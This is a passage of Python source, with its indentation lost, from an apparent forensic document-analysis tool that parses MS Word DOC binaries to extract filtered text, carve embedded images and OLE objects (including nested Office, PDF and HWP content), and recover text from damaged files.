#self.compound.content = filteredText.decode("utf-16")
###### DOC 추가
if len(filteredText) != 0:
nPos = filteredLen
usTmp1 = 0
usTmp2 = 0
if nPos >= 4:
usTmp1 = struct.unpack('<H', filteredText[0 + nPos - 4 : 0 + nPos - 4 + 2])[0]
usTmp2 = struct.unpack('<H', filteredText[0 + nPos - 2: 0 + nPos - 2 + 2])[0]
if usTmp1 == uNewline:
if usTmp2 != uNewline:
filteredText += b'\x0A\x00\x00\x00'
else:
if usTmp2 == uNewline:
filteredText += b'\x0A\x00\x00\x00'
else:
filteredText += b'\x0A\x00\x0A\x00\x00\x00'
#######
for i in range(0, len(filteredText), 2):
try:
self.compound.content += filteredText[i:i+2].decode('utf-16')
except UnicodeDecodeError:
continue
##### Image #####
try:
drawing_data = bytearray(self.compound.fp.open('Data').read())
drawing_offset = 0
img_num = 0
while drawing_offset < len(drawing_data):
if drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset) > 0:
#extension = ".jpg"
drawing_offset = drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset)
#drawing_offset = drawing_data.find(b'\x1D\xF0', drawing_offset)
elif drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset) > 0:
#extension = ".png"
drawing_offset = drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset)
#drawing_offset = drawing_data.find(b'\x1E\xF0', drawing_offset)
else:
break
embedded_blip_rh_ver_instance = struct.unpack('<H', drawing_data[drawing_offset: drawing_offset + 2])[0]
embedded_blip_rh_Type = struct.unpack('<H', drawing_data[drawing_offset + 2: drawing_offset + 4])[0]
embedded_blip_rh_recLen = struct.unpack('<I', drawing_data[drawing_offset + 4: drawing_offset + 8])[0]
drawing_offset += 0x08
embedded_size = embedded_blip_rh_recLen
embedded_blip_rgbUid1 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
embedded_blip_rgbUid2 = None
if int(embedded_blip_rh_ver_instance / 0x10) == 0x46B or int(
embedded_blip_rh_ver_instance / 0x10) == 0x6E3:
embedded_blip_rgbUid2 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
if embedded_blip_rh_Type != 0xF01A and embedded_blip_rh_Type != 0xF01B and embedded_blip_rh_Type != 0xF01C and \
embedded_blip_rh_Type != 0xF01D and embedded_blip_rh_Type != 0xF01E and embedded_blip_rh_Type != 0xF01F and \
embedded_blip_rh_Type != 0xF029:
break
extension = ""
if embedded_blip_rh_Type == 0xF01A:
extension = ".emf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01B:
extension = ".wmf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01C:
extension = ".pict"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01D:
extension = ".jpg"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01E:
extension = ".png"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01F:
extension = ".dib"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF029:
extension = ".tiff"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
if extension == "":
break
embedded_data = drawing_data[drawing_offset: drawing_offset + embedded_size]
drawing_offset += embedded_size
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
# self.compound.ole_path.append(
# self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + extension)
embedded_fp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + extension, 'wb')
img_num += 1
embedded_fp.write(embedded_data)
embedded_fp.close()
except Exception:
pass # No Image
### OLE
ole = olefile.OleFileIO(self.compound.filePath)
ole_fp = open(self.compound.filePath, 'rb')
img_num = 0
for i in range(0, len(ole.direntries)):
try:
if ole.direntries[i].name == '\x01Ole10Native': # Multimedia
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
ole_data_offset = 6 # Header
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # Label
data_name = ole_data[6 : ole_data_offset].decode('ASCII')
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # OrgPath
ole_data_offset += 8 # UType
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # DataPath
ole_data_offset += 1
data_size = struct.unpack('<I', ole_data[ole_data_offset : ole_data_offset + 4])[0]
ole_data_offset += 4
data = ole_data[ole_data_offset : ole_data_offset + data_size]
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + data_name)
temp = open(self.compound.ole_path + os.path.sep + data_name, 'wb')
temp.write(data)
temp.close()
elif ole.direntries[i].name == 'Package': # OOXML 처리
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if ole_data.find(b'\x78\x6C\x2F\x77\x6F\x72\x6B\x62\x6F\x6F\x6B\x2E\x78\x6D\x6C') > 0: # XLSX
extension = ".xlsx"
elif ole_data.find(b'\x77\x6F\x72\x64\x2F\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x78\x6D\x6C') > 0: # DOCX
extension = ".docx"
elif ole_data.find(b'\x70\x70\x74\x2F\x70\x72\x65\x73\x65\x6E\x74\x61\x74\x69\x6F\x6E\x2E\x78\x6D\x6C') > 0: # PPTX
extension = ".pptx"
else:
extension = ".zip"
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
# self.compound.ole_path.append(
# self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
# img_num) + extension)
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + extension, 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name == 'CONTENTS': # PDF
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
#self.compound.ole_path.append(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".pdf")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".pdf", 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name[0:1] == '_' and len(ole.direntries[i].name) == 11:
self.compound.has_ole = True
word_document = None
table = None
powerpoint_document = None
current_user = None
workbook = None
section_data = ""
for j in range(0, len(ole.direntries[i].kids)):
if ole.direntries[i].kids[j].name == "WordDocument":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
word_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "1Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "0Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "PowerPoint Document":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
powerpoint_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "Current User":
idx = ole.root.isectStart
chain = [idx]
while True:
idx = ole.fat[idx]
if idx == 4294967294:
break
chain.append(idx)
out = bytearray(b'')
for idx in chain:
pos = (idx + 1) * 512
ole_fp.seek(pos)
d = ole_fp.read(512)
out += d
current_user = out[64 * (ole.direntries[i].kids[j].isectStart):64 * (ole.direntries[i].kids[j].isectStart) + ole.direntries[i].kids[j].size]
elif ole.direntries[i].kids[j].name == "Workbook":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
workbook = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "BodyText":
section_data = ""
for k in range(0, len(ole.direntries[i].kids[j].kids)):
ole_fp.seek((ole.direntries[i].kids[j].kids[k].isectStart + 1) * 0x200)
temp_section_data = ole_fp.read(ole.direntries[i].kids[j].kids[k].size)
if temp_section_data[0:2] == b'\x42\x00':
is_compressed = False
else:
is_compressed = True
msg = self.inflateBodytext(temp_section_data, is_compressed)
if msg is not False:
section_data += msg
# DOC
result = None
if word_document != None and table != None:
result = self.__parse_doc_normal_for_ole__(word_document, table)
if result != None:
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# XLS
from modules.DEFA.MS_Office.carpe_xls import XLS
from modules.DEFA.MS_Office.carpe_compound import Compound
result = None
if workbook != None:
temp_xls = XLS(Compound(self.compound.filePath))
result = temp_xls.__parse_xls_normal_for_ole__(workbook)
if result != None:
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# PPT
from modules.DEFA.MS_Office.carpe_ppt import PPT
from modules.DEFA.MS_Office.carpe_compound import Compound
result = None
if powerpoint_document != None and current_user != None:
temp_ppt = PPT(Compound(self.compound.filePath))
result = temp_ppt.__parse_ppt_normal_for_ole__(powerpoint_document, current_user)
if result != None:
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
#self.compound.ole_path.append(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# HWP
if section_data != "":
if not (os.path.isdir(self.compound.ole_path)):
os.makedirs(os.path.join(self.compound.ole_path))
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(section_data)
temp.close()
img_num += 1
except Exception:
continue
data = len(ole.direntries)
#print(data)
ole_fp.close()
def __parse_doc_normal_for_ole__(self, word_document, byteTable):
if len(byteTable) == 0:
return self.compound.CONST_ERROR
# Extract doc Text
ccpText = b''
fcClx = b''
lcbClx = b''
aCP = b''
aPcd = b''
fcCompressed = b''
Clx = b''
ccpTextSize = 0
fcClxSize = 0
lcbClxSize = 0
ClxSize = 0
string = b''
CONST_FCFLAG = 1073741824 # 0x40000000
CONST_FCINDEXFLAG = 1073741823 # 0x3FFFFFFF
i = 0
j = 0
k = 0
# Check Encrypted
uc_temp = word_document[11]
uc_temp = uc_temp & 1
if uc_temp == 1:
return self.compound.CONST_ERROR
# Get cppText in FibRgLw
ccpText = word_document[0x4C:0x50]
ccpTextSize = struct.unpack('<I', ccpText)[0]
if (ccpTextSize == 0):
return self.compound.CONST_ERROR
# Get fcClx in FibRgFcLcbBlob
fcClx = word_document[0x1A2:0x1A6]
fcClxSize = struct.unpack('<I', fcClx)[0]
if (fcClxSize == 0):
return self.compound.CONST_ERROR
# Get lcbClx in FibRgFcLcbBlob
lcbClx = word_document[0x1A6:0x1AA]
lcbClxSize = struct.unpack('<I', lcbClx)[0]
if (lcbClxSize == 0):
return self.compound.CONST_ERROR
# Get Clx
Clx = byteTable[fcClxSize: fcClxSize + lcbClxSize]
if Clx[0] == 0x01:
cbGrpprl = struct.unpack("<H", Clx[1:3])[0]
Clx = byteTable[fcClxSize + cbGrpprl + 3: (fcClxSize + cbGrpprl + 3) + lcbClxSize - cbGrpprl + 3]
if Clx[0] != 0x02:
return self.compound.CONST_ERROR
ClxSize = struct.unpack('<I', Clx[1:5])[0]
ClxIndex = 5
PcdCount = 0
aCPSize = []
fcFlag = 0
fcIndex = 0
fcSize = 0
encodingFlag = False
PcdCount = int(((ClxSize / 4) / 3)) + 1
for i in range(0, PcdCount):
aCp = Clx[ClxIndex:ClxIndex + 4]
aCPSize.append(struct.unpack('<I', aCp[0:4])[0])
ClxIndex += 4
PcdCount -= 1
### Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
uCaption = b'\x53\x00\x45\x00\x51\x00'
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00'
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00'
uToc = b'\x54\x00\x4F\x00'
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00'
uEnd = b'\x20\x00\x01\x00\x14\x00'
uEnd2 = b'\x20\x00\x14\x00'
uEnd3 = b'\x20\x00\x15\x00'
uEnd4 = b'\x14\x00'
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00'
uHeader = b'\x13\x00'
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00'
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00'
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00'
uDoc = b'\x44\x00\x4F\x00\x43\x00'
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00'
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00'
### Filtering targets: 0x0001 ~ 0x0017(0x000A Line Feed skipped)
uTab = b'\x09\x00' # Horizontal Tab
uSpecial = b'\xF0'
bFullScanA = False
bFullScanU = False # if the size info is invalid, then the entire range will be scanned.
tempPlus = 0
for i in range(0, PcdCount):
aPcd = Clx[ClxIndex:ClxIndex + 8]
fcCompressed = aPcd[2:6]
fcFlag = struct.unpack('<I', fcCompressed[0:4])[0]
if CONST_FCFLAG == (fcFlag & CONST_FCFLAG):
encodingFlag = True # 8-bit ANSI
else:
encodingFlag = False # 16-bit Unicode
fcIndex = fcFlag & CONST_FCINDEXFLAG
k = 0
if encodingFlag == True: # 8-bit ANSI
fcIndex = int(fcIndex / 2)
fcSize = aCPSize[i + 1] - aCPSize[i]
if len(word_document) < fcIndex + fcSize + 1:
if bFullScanA == False and len(word_document) > fcIndex:
fcSize = len(word_document) - fcIndex - 1
bFullScanA = True
else:
ClxIndex += 8
continue
ASCIIText = word_document[fcIndex:fcIndex + fcSize]
UNICODEText = b''
for i in range(0, len(ASCIIText)):
UNICODEText += bytes([ASCIIText[i]])
UNICODEText += b'\x00'
while k < len(UNICODEText):
if (UNICODEText[k: k + 2] == uSection2 or UNICODEText[k: k + 2] == uSection3 or UNICODEText[
k: k + 2] == uSection4 or
UNICODEText[k: k + 2] == uSection5 or UNICODEText[k: k + 2] == uSection7 or UNICODEText[
k: k + 2] == uSection8 or
UNICODEText[k + 1] == uSpecial or UNICODEText[k: k + 2] == uTrash):
k += 2 ### while
continue
if (UNICODEText[k: k + 2] == uNewline or UNICODEText[k: k + 2] == uNewline2 or UNICODEText[
k: k + 2] == uNewline3 or UNICODEText[
k: k + 2] == uNewline4):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uNewline or
UNICODEText[j:j + 2] == uNewline2 or UNICODEText[j:j + 2] == uNewline3 or UNICODEText[
j:j + 2] == uNewline4 or
UNICODEText[j:j + 2] == uTab or UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= len(UNICODEText):
break
elif (UNICODEText[k:k + 2] == uBlank or UNICODEText[k:k + 2] == uBlank2 or UNICODEText[
k:k + 2] == uTab):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uTab or
UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if (j >= len(UNICODEText)):
break
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
k += 2
elif encodingFlag == False: ### 16-bit Unicode
fcSize = 2 * (aCPSize[i + 1] - aCPSize[i])
if (len(
word_document) < fcIndex + fcSize + 1): # Invalid structure - size info is invalid (large) => scan from fcIndex to last
if (bFullScanU == False and len(word_document) > fcIndex):
fcSize = len(word_document) - fcIndex - 1
bFullScanU = True
else:
ClxIndex = ClxIndex + 8
continue
while k < fcSize:
if (word_document[fcIndex + k: fcIndex + k + 2] == uSection2 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection3 or
word_document[fcIndex + k: fcIndex + k + 2] == uSection4 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection5 or
word_document[fcIndex + k: fcIndex + k + 2] == uSection7 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection8 or
word_document[fcIndex + k + 1] == uSpecial or word_document[
fcIndex + k: fcIndex + k + 2] == uTrash):
k += 2
continue
if (word_document[fcIndex + k: fcIndex + k + 2] == uNewline or word_document[
fcIndex + k: fcIndex + k + 2] == uNewline2 or
word_document[fcIndex + k: fcIndex + k + 2] == uNewline3 or word_document[
fcIndex + k: fcIndex + k + 2] == uNewline4):
if (word_document[fcIndex + k] == 0x0d):
string += b'\x0a'
string += bytes([word_document[fcIndex + k + 1]])
else:
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
j = k + 2
while j < fcSize:
if (word_document[fcIndex + j: fcIndex + j + 2] == uSection2 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection3 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection4 or
word_document[fcIndex + j: fcIndex + j + 2] == uSection5 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection7 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection8 or
word_document[fcIndex + j: fcIndex + j + 2] == uBlank or word_document[
fcIndex + j: fcIndex + j + 2] == uBlank2 or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline2 or
word_document[fcIndex + j: fcIndex + j + 2] == uNewline3 or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline4 or word_document[
fcIndex + j: fcIndex + j + 2] == uTab or
word_document[
fcIndex + j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= fcSize:
break
elif word_document[fcIndex + k: fcIndex + k + 2] == uBlank or word_document[
fcIndex + k: fcIndex + k + 2] == uBlank2 or word_document[
fcIndex + k: fcIndex + k + 2] == uTab:
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
j = k + 2
while j < fcSize:
if (word_document[fcIndex + j: fcIndex + j + 2] == uSection2 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection3 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection4 or
word_document[fcIndex + j: fcIndex + j + 2] == uSection5 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection7 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection8 or
word_document[fcIndex + j: fcIndex + j + 2] == uBlank or word_document[
fcIndex + j: fcIndex + j + 2] == uBlank2 or word_document[
fcIndex + j: fcIndex + j + 2] == uTab or
word_document[fcIndex + j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= fcSize:
break
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
k += 2
ClxIndex += 8
dictionary = self.__doc_extra_filter__(string, len(string))
filteredText = dictionary['string']
filteredLen = dictionary['length']
#self.compound.content = filteredText.decode("utf-16")
###### DOC 추가
if len(filteredText) != 0:
nPos = filteredLen
usTmp1 = 0
usTmp2 = 0
if nPos >= 4:
usTmp1 = struct.unpack('<H', filteredText[0 + nPos - 4 : 0 + nPos - 4 + 2])[0]
usTmp2 = struct.unpack('<H', filteredText[0 + nPos - 2: 0 + nPos - 2 + 2])[0]
if usTmp1 == uNewline:
if usTmp2 != uNewline:
filteredText += b'\x0A\x00\x00\x00'
else:
if usTmp2 == uNewline:
filteredText += b'\x0A\x00\x00\x00'
else:
filteredText += b'\x0A\x00\x0A\x00\x00\x00'
result = ""
#######
for i in range(0, len(filteredText), 2):
try:
result += filteredText[i:i+2].decode('utf-16')
except UnicodeDecodeError:
continue
return result
def inflateBodytext(self, section, isCompressed):
msg = bytearray()
if isCompressed:
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
try:
stream = decompress.decompress(section)
stream += decompress.flush()
except:
return False
else:
stream = section
streamLen = len(stream)
nPos = 0
RecordHeader = stream[0:4]
while (RecordHeader[0] >= 0x40) and (RecordHeader[0] <= 0x60):
try:
nRecordLength = (RecordHeader[3] << 4) | (RecordHeader[2] >> 4)
nRecordPos = 4
if RecordHeader[0] == 0x43:
temp = stream[nPos + 4:nPos + 4 + 2]
uWord = struct.unpack('<H', temp)
while True:
if 0x0001 <= uWord[0] <= 0x0017:
if uWord[0] != 0x00A and uWord[0] != 0x000D:
nRecordPos += 16
else:
break
else:
break
if nRecordLength < nRecordPos + 2:
break
temp = stream[nPos + nRecordPos:nPos + nRecordPos + 2]
uWord = struct.unpack('<H', temp)
if (nRecordLength - nRecordPos + 4) / 2 >= 1:
index = (nRecordLength - nRecordPos + 4) / 2
i = 0
while i < int(index):
temp = stream[nPos + nRecordPos + i * 2:nPos + nRecordPos + i * 2 + 2]
uWord = struct.unpack('<H', temp)
if 0x0001 <= uWord[0] <= 0x0017:
if uWord[0] != 0x00A and uWord[0] != 0x000D:
if uWord[0] == 0x0009:
msg.append(0x20)
msg.append(0x00)
i += 7
continue
if uWord[0] == 0x000D:
msg.append(0x0A)
msg.append(0x00)
msg.append(stream[nPos + nRecordPos + i * 2])
msg.append(stream[nPos + nRecordPos + i * 2 + 1])
i += 1
nPos += nRecordLength + 4
if streamLen <= nPos:
break
else:
RecordHeader = stream[nPos:nPos + 4]
except:
break
# 필터링
if len(msg) > 0:
try:
msg = msg.decode("utf-16", 'ignore')
except:
msg = ""
return msg
else:
return False
def __parse_doc_damaged__(self):
file = bytearray(self.compound.fp.read())
m_word = b''
m_table = b''
m_data = b''
wordFlag = False
tableFlag = False
dataFlag = True
word_document = b''
drawing_data = b''
data = b''
one_table = b''
zero_table = b''
string = b''
CONST_FCFLAG = 1073741824 # 0x40000000
CONST_FCINDEXFLAG = 1073741823 # 0x3FFFFFFF
CONST_TABLE1_WORD = b'\x57\x00\x6F\x00\x72\x00\x64\x00\x44\x00\x6F\x00'
CONST_TABLE2_1TABLE = b'\x31\x00\x54\x00\x61\x00\x62\x00\x6C\x00\x65\x00'
CONST_DATA_SIGNATURE = b'\xEC\xA5'
CONST_DATA = b'\x44\x00\x61\x00\x74\x00\x61\x00'
nCurPos = 0
while(nCurPos < len(file)):
if(file[nCurPos : nCurPos + 12] == CONST_TABLE1_WORD):
m_word = file[nCurPos : nCurPos + 0x80]
wordFlag = True
if (file[nCurPos: nCurPos + 12] == CONST_TABLE2_1TABLE):
m_table = file[nCurPos: nCurPos + 0x80]
tableFlag = True
if (file[nCurPos: nCurPos + 8] == CONST_DATA):
m_data = file[nCurPos: nCurPos + 0x80]
dataFlag = True
if (tableFlag == True and wordFlag == True and dataFlag == True):
break
nCurPos += 0x80
if tableFlag == False or wordFlag == False:
return
# word
if (file[0x200:0x202] == CONST_DATA_SIGNATURE):
if wordFlag == True:
wordStartIndex = struct.unpack('<I', m_word[0x74:0x78])[0]
wordSize = struct.unpack('<I', m_word[0x78:0x7C])[0]
if wordSize < len(file) - 0x202:
word_document = file[(wordStartIndex + 1) * 0x200 : (wordStartIndex + 1) * 0x200 + wordSize]
else:
word_document = file[0x200:]
#table
if tableFlag == True:
tableStartIndex = struct.unpack('<I', m_table[0x74:0x78])[0]
tableSize = struct.unpack('<I', m_table[0x78:0x7C])[0]
byteTable = file[(tableStartIndex + 1) * 0x200 : (tableStartIndex + 1) * 0x200 + tableSize]
#data
if dataFlag == True:
try: # 임시처리
dataStartIndex = struct.unpack('<I', m_data[0x74:0x78])[0]
except struct.error:
return False
dataSize = struct.unpack('<I', m_data[0x78:0x7C])[0]
drawing_data = file[(dataStartIndex + 1) * 0x200 : (dataStartIndex + 1) * 0x200 + dataSize]
if len(word_document) <= 0x200: ### No Data
return False
# Get cppText in FibRgLw
ccpText = word_document[0x4C:0x50]
ccpTextSize = struct.unpack('<I', ccpText)[0]
if (ccpTextSize == 0):
return self.compound.CONST_ERROR
# Get fcClx in FibRgFcLcbBlob
fcClx = word_document[0x1A2:0x1A6]
fcClxSize = struct.unpack('<I', fcClx)[0]
if (fcClxSize == 0):
return self.compound.CONST_ERROR
# Get lcbClx in FibRgFcLcbBlob
lcbClx = word_document[0x1A6:0x1AA]
lcbClxSize = struct.unpack('<I', lcbClx)[0]
if (lcbClxSize == 0):
return self.compound.CONST_ERROR
# Get Clx
Clx = byteTable[fcClxSize: fcClxSize + lcbClxSize]
if Clx[0] == 0x01:
cbGrpprl = struct.unpack("<H", Clx[1:3])[0]
Clx = byteTable[fcClxSize + cbGrpprl + 3: (fcClxSize + cbGrpprl + 3) + lcbClxSize - cbGrpprl + 3]
if Clx[0] != 0x02:
return self.compound.CONST_ERROR
ClxSize = struct.unpack('<I', Clx[1:5])[0]
ClxIndex = 5
PcdCount = 0
aCPSize = []
fcFlag = 0
fcIndex = 0
fcSize = 0
encodingFlag = False
PcdCount = int(((ClxSize / 4) / 3)) + 1
for i in range(0, PcdCount):
aCp = Clx[ClxIndex:ClxIndex + 4]
aCPSize.append(struct.unpack('<I', aCp[0:4])[0])
ClxIndex += 4
PcdCount -= 1
### Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
uCaption = b'\x53\x00\x45\x00\x51\x00'
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00'
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00'
uToc = b'\x54\x00\x4F\x00'
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00'
uEnd = b'\x20\x00\x01\x00\x14\x00'
uEnd2 = b'\x20\x00\x14\x00'
uEnd3 = b'\x20\x00\x15\x00'
uEnd4 = b'\x14\x00'
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00'
uHeader = b'\x13\x00'
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00'
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00'
